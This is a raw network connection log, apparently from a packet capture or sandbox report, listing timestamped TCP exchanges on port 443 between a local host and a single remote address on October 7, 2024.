Oct 7, 2024 18:47:52.441205978 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.444128990 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.444453001 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.444483042 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.444983959 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.444994926 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.451668024 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.451987028 CEST	49834	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.451994896 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.452565908 CEST	49834	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.452569962 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.562036991 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.562119007 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.562176943 CEST	49836	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.562359095 CEST	49836	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.562393904 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.562424898 CEST	49836	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.562439919 CEST	443	49836	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.565481901 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.565509081 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.565562963 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.565773964 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.565783024 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.567034006 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.567781925 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.567841053 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.567857027 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.567898035 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.567981958 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.568058968 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.568069935 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.568083048 CEST	49833	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.568089008 CEST	443	49833	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.569675922 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.570379019 CEST	49838	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.570394039 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.570436001 CEST	49838	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.570630074 CEST	49838	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.570642948 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.571860075 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.571969032 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.571964979 CEST	49832	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.572037935 CEST	49832	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.572084904 CEST	49832	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.572084904 CEST	49832	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.572129011 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.572159052 CEST	443	49832	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.572761059 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.572789907 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.572824001 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.572832108 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.572845936 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.572871923 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.572889090 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.572971106 CEST	49834	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.573149920 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.573168993 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.573194027 CEST	49835	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.573208094 CEST	443	49835	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.573245049 CEST	49834	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.573245049 CEST	49834	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.573251963 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.573260069 CEST	443	49834	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.575751066 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.575804949 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.575917006 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.576040030 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.576067924 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.577018976 CEST	49840	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.577049017 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.577110052 CEST	49840	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.577430964 CEST	49840	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.577442884 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.578550100 CEST	49841	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.578592062 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:52.578661919 CEST	49841	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.578779936 CEST	49841	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:52.578798056 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.348212957 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.348733902 CEST	49840	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.348789930 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.349169016 CEST	49840	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.349181890 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.356748104 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.357157946 CEST	49838	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.357177973 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.357672930 CEST	49838	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.357677937 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.364392042 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.364748955 CEST	49841	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.364773035 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.364804983 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.365104914 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.365118027 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.365319014 CEST	49841	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.365324020 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.365765095 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.365771055 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.403934956 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.404392004 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.404444933 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.404777050 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.404792070 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.464895964 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.465856075 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.465948105 CEST	49838	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.465986013 CEST	49838	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.466002941 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.466012955 CEST	49838	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.466017962 CEST	443	49838	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.469322920 CEST	49842	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.469358921 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.469470024 CEST	49842	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.469666958 CEST	49842	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.469685078 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.473939896 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.474020004 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.474123955 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.474199057 CEST	49841	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.474266052 CEST	49841	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.474277020 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.474284887 CEST	49841	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.474288940 CEST	443	49841	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.476449013 CEST	49843	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.476520061 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.476672888 CEST	49843	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.476835966 CEST	49843	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.476867914 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.477041006 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.477066994 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.477103949 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.477123976 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.477150917 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.477278948 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.477288008 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.477296114 CEST	49837	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.477299929 CEST	443	49837	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.479331017 CEST	49844	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.479372025 CEST	443	49844	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.479557991 CEST	49844	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.479758978 CEST	49844	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.479772091 CEST	443	49844	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.513883114 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.514240026 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.514300108 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.514322996 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.514377117 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.514431000 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.514461994 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.514488935 CEST	49839	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.514503956 CEST	443	49839	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.516881943 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.516921997 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.517447948 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.517667055 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.517685890 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.522221088 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.522794962 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.522880077 CEST	49840	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.522939920 CEST	49840	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.522939920 CEST	49840	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.522973061 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.522996902 CEST	443	49840	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.525233984 CEST	49846	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.525247097 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:53.525492907 CEST	49846	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.525584936 CEST	49846	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:53.525590897 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.106010914 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.106499910 CEST	49843	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.106529951 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.106914997 CEST	443	49844	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.106947899 CEST	49843	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.106951952 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.107300997 CEST	49844	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.107336044 CEST	443	49844	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.107718945 CEST	49844	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.107727051 CEST	443	49844	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.113316059 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.113679886 CEST	49842	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.113722086 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.114079952 CEST	49842	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.114087105 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.156985998 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.157433987 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.157475948 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.157869101 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.157876015 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.171355963 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.171766043 CEST	49846	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.171802998 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.172166109 CEST	49846	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.172172070 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.216758013 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.216804028 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.216856956 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.217000961 CEST	49843	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.217084885 CEST	49843	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.217102051 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.217112064 CEST	49843	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.217118025 CEST	443	49843	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.219855070 CEST	49847	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.219871998 CEST	443	49847	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.219942093 CEST	49847	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.219965935 CEST	443	49844	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.220030069 CEST	443	49844	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.220098972 CEST	49847	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.220109940 CEST	443	49847	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.220134020 CEST	49844	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.220158100 CEST	49844	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.220164061 CEST	443	49844	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.222160101 CEST	49848	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.222183943 CEST	443	49848	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.222284079 CEST	49848	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.222412109 CEST	49848	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.222421885 CEST	443	49848	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.225862026 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.226010084 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.226063013 CEST	49842	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.226092100 CEST	49842	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.226109982 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.226124048 CEST	49842	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.226130009 CEST	443	49842	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.227972984 CEST	49849	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.227998972 CEST	443	49849	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:54.228113890 CEST	49849	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.228230953 CEST	49849	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:54.228245020 CEST	443	49849	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.324099064 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.324161053 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.324210882 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.324299097 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.324625015 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.324625015 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.325675964 CEST	443	49847	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.325712919 CEST	49845	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.325735092 CEST	443	49845	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.325757980 CEST	443	49848	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.325776100 CEST	443	49849	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.325788975 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.325870037 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.325984001 CEST	49846	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326220989 CEST	49850	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326263905 CEST	443	49850	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.326335907 CEST	49850	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326442957 CEST	49851	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326478958 CEST	443	49851	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.326503992 CEST	49852	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326524019 CEST	49851	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326525927 CEST	443	49852	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.326560020 CEST	49850	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326572895 CEST	443	49850	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.326642990 CEST	49852	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326672077 CEST	49852	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326678991 CEST	443	49852	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.326765060 CEST	49851	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326777935 CEST	443	49851	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.326822042 CEST	49846	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326826096 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.326833010 CEST	49846	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.326837063 CEST	443	49846	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.328355074 CEST	49853	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.328375101 CEST	443	49853	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.328460932 CEST	49853	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.328577995 CEST	49853	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.328588963 CEST	443	49853	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.328783035 CEST	49854	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.328789949 CEST	443	49854	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.328850031 CEST	49854	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.328989029 CEST	49854	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.328995943 CEST	443	49854	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.370605946 CEST	443	49852	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.370775938 CEST	443	49851	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.370809078 CEST	443	49850	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.370862007 CEST	443	49853	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.370917082 CEST	443	49854	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.371471882 CEST	49856	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.371471882 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.371495008 CEST	443	49856	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.371498108 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.371730089 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.371730089 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.371757030 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.371790886 CEST	49856	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.372180939 CEST	49856	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.372189999 CEST	443	49856	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.373636961 CEST	49857	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.373697996 CEST	443	49857	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.374389887 CEST	49857	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.374840975 CEST	49858	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.374866009 CEST	443	49858	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.374954939 CEST	49859	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.374965906 CEST	443	49859	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.374968052 CEST	49858	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.375010014 CEST	49859	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.375174999 CEST	49859	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.375183105 CEST	443	49859	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.375241995 CEST	49857	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.375273943 CEST	443	49857	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.375332117 CEST	49858	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.375345945 CEST	443	49858	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.383403063 CEST	443	49856	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.385705948 CEST	49860	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.385735989 CEST	443	49860	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.385906935 CEST	49860	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.386388063 CEST	49860	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.386398077 CEST	443	49860	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.386579990 CEST	443	49859	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.386775017 CEST	49861	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.386831999 CEST	443	49861	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.386902094 CEST	49861	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.387028933 CEST	49861	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.387058020 CEST	443	49861	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.398070097 CEST	443	49860	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.398272991 CEST	49862	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.398303986 CEST	443	49862	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.398458004 CEST	49862	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.398458004 CEST	49862	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.398516893 CEST	443	49862	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.399955034 CEST	443	49861	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.400283098 CEST	443	49857	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.401218891 CEST	443	49858	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.401330948 CEST	49857	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401330948 CEST	49858	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401330948 CEST	49857	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401428938 CEST	49858	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401454926 CEST	443	49858	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.401515007 CEST	49863	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401535034 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.401546001 CEST	49864	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401575089 CEST	443	49864	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.401619911 CEST	49864	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401705980 CEST	49863	443	192.168.2.6	13.107.253.72
